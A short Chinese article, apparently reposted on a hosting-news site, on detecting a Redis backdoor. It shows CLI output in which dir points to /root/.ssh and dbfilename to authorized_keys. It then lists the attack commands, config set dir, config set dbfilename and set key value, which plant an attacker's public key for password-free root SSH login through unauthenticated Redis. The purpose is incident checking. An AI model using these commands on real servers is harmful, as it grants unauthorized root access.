欢迎光临
我们一直在努力

Redis写入免密后门排查

建站超值云服务器,限时71元/月

排查

127.0.0.1:6379> config get dir
1) "dir"
2) "/root/.ssh"

127.0.0.1:6379> config get dbfilename
1) "dbfilename"
2) "authorized_keys"

原理redis未授权远程访问导致

config set dir /root/.ssh
config set dbfilenameauthorized_keys
set key value

其中value为生成公钥,即可将公钥保存在服务器,使得登录时不需要输入账号与密码。

赞(0)
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com 特别注意:本站所有转载文章言论不代表本站观点! 本站所提供的图片等素材,版权归原作者所有,如需使用,请与原作者联系。未经允许不得转载:IDC资讯中心 » Redis写入免密后门排查
分享到: 更多 (0)